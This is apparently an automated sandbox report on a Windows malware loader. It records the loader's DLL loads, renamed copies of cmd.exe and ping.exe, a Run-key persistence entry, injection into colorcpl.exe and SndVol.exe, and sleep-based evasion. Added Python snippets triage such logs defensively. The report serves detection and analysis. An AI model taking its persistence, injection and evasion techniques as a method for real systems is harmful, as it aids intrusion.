Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: mswsock.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: iphlpapi.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: winnsi.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: smartscreenps.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: smartscreenps.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: smartscreenps.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: ????.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: ???e???????????.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: ???e???????????.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: tquery.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: cryptdll.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: spp.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: vssapi.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: vsstrace.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: spp.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: vssapi.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: vsstrace.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: spp.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: vssapi.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: vsstrace.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: sppwmi.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: slc.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: sppcext.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: winscard.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: devobj.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: cryptsp.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: rsaenh.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: cryptbase.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\SndVol.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\SndVol.exe Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\SndVol.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\SndVol.exe Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\SndVol.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\SndVol.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\SndVol.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\SndVol.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\SndVol.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\SndVol.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\SndVol.exe Section loaded: rstrtmgr.dll
Source: C:\Windows\SysWOW64\SndVol.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\SndVol.exe Section loaded: ntasn1.dll
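Read per process rather than as one flat list, the "Section loaded" events above carry the injection story that the report's signatures (APC queuing, early-bird injection, foreign-process memory allocation) point at: colorcpl.exe and SndVol.exe are GUI applets with no reason to load wininet.dll, dnsapi.dll or fwpuclnt.dll, and Vjrsafyh.PIF is a PE running from a user-writable folder under an extension that is not .exe. The following Python is an added triage example, not part of the sandbox report; it parses report lines of this shape, groups them by process, and applies three rules. The NO_NETWORK_BASELINE set and the rule names are assumptions an analyst would maintain for their own environment; the sample lines are copied from the entries above.

```python
import re
from collections import OrderedDict

# Constructed input: "Section loaded" lines copied from the report above. The trailing
# "Jump to behavior" is the sandbox UI's link text and is tolerated by the parser.
SAMPLE_LINES = r"""
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe Section loaded: esent.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: colorui.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: mscms.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: wininet.dll Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Section loaded: ??l.dll Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe Section loaded: ncrypt.dll Jump to behavior
"""

LINE_RE = re.compile(
    r"^Source:\s+(?P<proc>.+?)\s+Section loaded:\s+(?P<dll>\S+)(?:\s+Jump to behavior)?\s*$"
)

# Modules that give a process an HTTP/DNS/socket stack.
NETWORK_DLLS = {"wininet.dll", "winhttp.dll", "dnsapi.dll", "mswsock.dll", "fwpuclnt.dll", "webio.dll"}
# Assumption: analyst-maintained baseline of GUI applets that never need a network stack
# of their own, so a network stack inside them means injected code.
NO_NETWORK_BASELINE = {"colorcpl.exe", "sndvol.exe"}
USER_WRITABLE_PREFIXES = ("c:\\users\\", "c:\\programdata\\")


def parse_section_loads(lines):
    """Map each process image path to its module loads, in order, duplicates kept
    (a module loaded three times is three events in the report)."""
    loads = OrderedDict()
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            loads.setdefault(m["proc"], []).append(m["dll"].lower())
    return loads


def find_anomalies(loads):
    """Return (process, rule, detail) tuples for loads that do not fit the host binary."""
    findings = []
    for proc, dlls in loads.items():
        name = re.split(r"[\\/]", proc)[-1]
        ext = name[name.rfind("."):].lower() if "." in name else ""
        net = sorted(set(dlls) & NETWORK_DLLS)
        if name.lower() in NO_NETWORK_BASELINE and net:
            findings.append((proc, "network-stack-in-gui-lolbin", ",".join(net)))
        if proc.lower().startswith(USER_WRITABLE_PREFIXES) and ext != ".exe":
            findings.append((proc, "odd-extension-in-user-writable-path", ext))
        # Module names the sandbox could not render: a loader resolving DLLs by
        # non-ASCII or deliberately mangled names.
        garbled = sorted({d for d in dlls if "?" in d})
        if garbled:
            findings.append((proc, "unprintable-module-name", ",".join(garbled)))
    return findings


if __name__ == "__main__":
    loads = parse_section_loads(SAMPLE_LINES.splitlines())
    for proc, rule, detail in find_anomalies(loads):
        print(f"{rule:40} {proc}  [{detail}]")
```

On the lines above, the same rules fire for both colorcpl.exe instances, for SndVol.exe and for Vjrsafyh.PIF, while the original sample, cmd.exe and esentutl.exe stay quiet; the baseline set is the part to tune per environment.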
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdb source: D2pQ4J4GGZ.exe, D2pQ4J4GGZ.exe, 00000000.00000002.2150540153.00000000029EE000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2164833746.0000000020717000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2032389922.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2164833746.0000000020700000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2164833746.00000000206D0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2031234000.000000007FCE0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000004.00000003.2123647740.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.4.dr
Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000005.00000003.2129503162.0000000005620000.00000004.00001000.00020000.00000000.sdmp, xpha.pif.5.dr
Source: Binary string: easinvoker.pdbH source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdbGCTL source: D2pQ4J4GGZ.exe, 00000000.00000003.2032127390.000000000249D000.00000004.00000020.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2150540153.00000000029EE000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2164833746.0000000020717000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2130066315.000000002180D000.00000004.00000020.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2032389922.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2164833746.0000000020700000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2164833746.00000000206D0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2031234000.000000007FCE0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2130066315.000000002183E000.00000004.00000020.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2149724742.00000000024A2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: cmd.pdb source: esentutl.exe, 00000004.00000003.2123647740.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.4.dr
Source: Binary string: ping.pdb source: esentutl.exe, 00000005.00000003.2129503162.0000000005620000.00000004.00001000.00020000.00000000.sdmp, xpha.pif.5.dr
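The PDB strings above come from CodeView "RSDS" debug records and are worth extracting deliberately rather than by eyeballing a string dump: cmd.pdb inside alpha.pif and ping.pdb inside xpha.pif show that those .pif files are copies of cmd.exe and ping.exe (matching the "copies cmd.exe with a different name" signature), while truesight.pdb and easinvoker.pdb in the sample's memory identify third-party binaries it carries. The following Python is an added example, not part of the report or of any sandbox tooling: it scans raw bytes for RSDS records and flags a PDB whose basename does not match the file that contains it. The GUID, ages and the byte layout of the sample blob are constructed; the "cmd.pdbUGP" run-on form mimics how the report's string dump shows a path followed by whatever bytes come next, so the scanner does not require the NUL terminator.

```python
import re
import struct
import uuid

# CodeView RSDS record: "RSDS", 16-byte GUID, 4-byte age, PDB path (normally NUL-terminated;
# the terminator is not required so that run-on variants like "cmd.pdbUGP" still match).
RSDS_RE = re.compile(rb"RSDS(.{16})(.{4})([\x20-\x7e]{1,260}?\.(?:pdb|PDB))", re.DOTALL)


def _cv_record(path, guid, age):
    """Build an RSDS record the way a linker emits it (used only to construct the sample)."""
    return b"RSDS" + guid.bytes_le + struct.pack("<I", age) + path.encode("ascii") + b"\x00"


# Constructed sample blob: three records separated by junk; GUID and ages are invented.
SAMPLE_GUID = uuid.UUID("12345678-1234-5678-1234-567812345678")
SAMPLE_BLOB = (
    b"\x00" * 8
    + _cv_record(r"E:\Adlice\Truesight\x64\Release\truesight.pdb", SAMPLE_GUID, 1)
    + b"MZ\x90\x00"
    + _cv_record("easinvoker.pdb", SAMPLE_GUID, 3)
    + b"\x00" * 4
    + _cv_record("cmd.pdb", SAMPLE_GUID, 2)[:-1] + b"UGP\x00"   # run-on form, no NUL after .pdb
)


def extract_pdb_paths(data):
    """Scan raw bytes (a PE file or a memory dump) for RSDS records."""
    records = []
    for m in RSDS_RE.finditer(data):
        guid = uuid.UUID(bytes_le=m.group(1))          # GUID is stored little-endian
        age = struct.unpack("<I", m.group(2))[0]
        records.append({"offset": m.start(), "guid": str(guid), "age": age,
                        "path": m.group(3).decode("ascii")})
    return records


def _stem(filename):
    base = re.split(r"[\\/]", filename)[-1].lower()
    return base.rsplit(".", 1)[0]


def is_renamed_system_binary(pdb_path, container_name):
    """True when the PDB basename does not match the file it was found in, e.g. cmd.pdb
    inside alpha.pif: the file is a copied and renamed binary, not its own build."""
    return _stem(pdb_path) != _stem(container_name)


if __name__ == "__main__":
    for rec in extract_pdb_paths(SAMPLE_BLOB):
        print(f"0x{rec['offset']:04x} age={rec['age']} {rec['guid']} {rec['path']}")
    print("alpha.pif is a renamed copy:", is_renamed_system_binary("cmd.pdb", "alpha.pif"))
```

Run against a dropped file, the GUID and age are what you feed to a symbol server or compare against a known-good cmd.exe to confirm the copy is byte-identical to the system binary rather than a patched one.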

Data Obfuscation

Source: Yara match File source: 0.2.D2pQ4J4GGZ.exe.29c0000.0.unpack, type: UNPACKEDPE
Source: alpha.pif.4.dr Static PE information: 0xF8D87E17 [Thu Apr 20 00:53:43 2102 UTC]
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_029D894C LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_029D894C
Source: alpha.pif.4.dr Static PE information: section name: .didat
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_029C63B0 push 029C640Bh; ret 0_2_029C6403
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_029C63AE push 029C640Bh; ret 0_2_029C6403
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_029CC349 push 8B029CC1h; ret 0_2_029CC34E
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_029EC378 push 029EC56Eh; ret 0_2_029EC566
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_029C6784 push 029C67C6h; ret 0_2_029C67BE
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_029C6782 push 029C67C6h; ret 0_2_029C67BE
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_02A9E716 push ecx; ret 0_2_02A9E729
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_02A7C446 push ecx; ret 0_2_02A7C459
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_029EC570 push 029EC56Eh; ret 0_2_029EC566
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_029CC56C push ecx; mov dword ptr [esp], edx 0_2_029CC571
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_029D8AD8 push 029D8B10h; ret 0_2_029D8B08
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_029DAAE0 push 029DAB18h; ret 0_2_029DAB10
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_029CCA37 push 029CCD72h; ret 0_2_029CCD6A
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_02A34A50 push eax; ret 0_2_02A34B20
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_029CCBEC push 029CCD72h; ret 0_2_029CCD6A
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_029D886C push 029D88AEh; ret 0_2_029D88A6
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_029D6948 push 029D69F3h; ret 0_2_029D69EB
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_029D6946 push 029D69F3h; ret 0_2_029D69EB
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_029D2F60 push 029D2FD6h; ret 0_2_029D2FCE
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_029ED2FC push 029ED367h; ret 0_2_029ED35F
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_029C332C push eax; ret 0_2_029C3368
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_029ED0AC push 029ED125h; ret 0_2_029ED11D
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_02A9F038 push eax; ret 0_2_02A9F056
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_029D306C push 029D30B9h; ret 0_2_029D30B1
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_029D306B push 029D30B9h; ret 0_2_029D30B1
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_029ED1F8 push 029ED288h; ret 0_2_029ED280
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_029DF108 push ecx; mov dword ptr [esp], edx 0_2_029DF10D
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_029ED144 push 029ED1ECh; ret 0_2_029ED1E4
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_029CD5A0 push 029CD5CCh; ret 0_2_029CD5C4
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_029D790C push 029D7989h; ret 0_2_029D7981
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_029D5E7C push ecx; mov dword ptr [esp], edx 0_2_029D5E7E

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\xpha.pif Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\Libraries\Vjrsafyh.PIF Jump to dropped file
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027C6EEB ShellExecuteW,URLDownloadToFileW, 8_2_027C6EEB

Boot Survival

Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\xpha.pif Jump to dropped file
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027DAADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 8_2_027DAADB
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Vjrsafyh Jump to behavior

Hooking and other Techniques for Hiding and Protection

Source: initial sample Icon embedded in binary file: icon matches a legit application icon: adobe 12.png
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_029DAB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_029DAB1C
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027CF7E2 Sleep,ExitProcess, 8_2_027CF7E2
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_027CF7E2 Sleep,ExitProcess, 11_2_027CF7E2
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_0280F7E2 Sleep,ExitProcess, 13_2_0280F7E2
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 8_2_027DA7D9
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 11_2_027DA7D9
Source: C:\Windows\SysWOW64\SndVol.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 13_2_0281A7D9
Source: C:\Windows\SysWOW64\colorcpl.exe Window / User API: threadDelayed 5281 Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Window / User API: threadDelayed 4709 Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe Dropped PE file which has not been started: C:\Users\Public\xpha.pif Jump to dropped file
Source: C:\Windows\SysWOW64\colorcpl.exe API coverage: 9.8 %
Source: C:\Windows\SysWOW64\colorcpl.exe API coverage: 6.2 %
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF API coverage: 9.8 %
Source: C:\Windows\SysWOW64\SndVol.exe API coverage: 5.9 %
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 6508 Thread sleep count: 5281 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 6508 Thread sleep time: -15843000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 6508 Thread sleep count: 4709 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 6508 Thread sleep time: -14127000s >= -30000s Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_029C5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 0_2_029C5908
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027C928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 8_2_027C928E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027DC322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 8_2_027DC322
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027CC388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 8_2_027CC388
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027C96A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 8_2_027C96A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027CBB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 8_2_027CBB6B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027D9B86 FindFirstFileW,FindNextFileW,FindNextFileW, 8_2_027D9B86
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027C7877 FindFirstFileW,FindNextFileW, 8_2_027C7877
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027C8847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 8_2_027C8847
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_0280E8F9 FindFirstFileExA, 8_2_0280E8F9
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027CBD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 8_2_027CBD72
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_027C928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 11_2_027C928E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_027DC322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 11_2_027DC322
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_027CC388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 11_2_027CC388
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_027C96A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 11_2_027C96A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_027CBB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 11_2_027CBB6B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_027D9B86 FindFirstFileW,FindNextFileW,FindNextFileW, 11_2_027D9B86
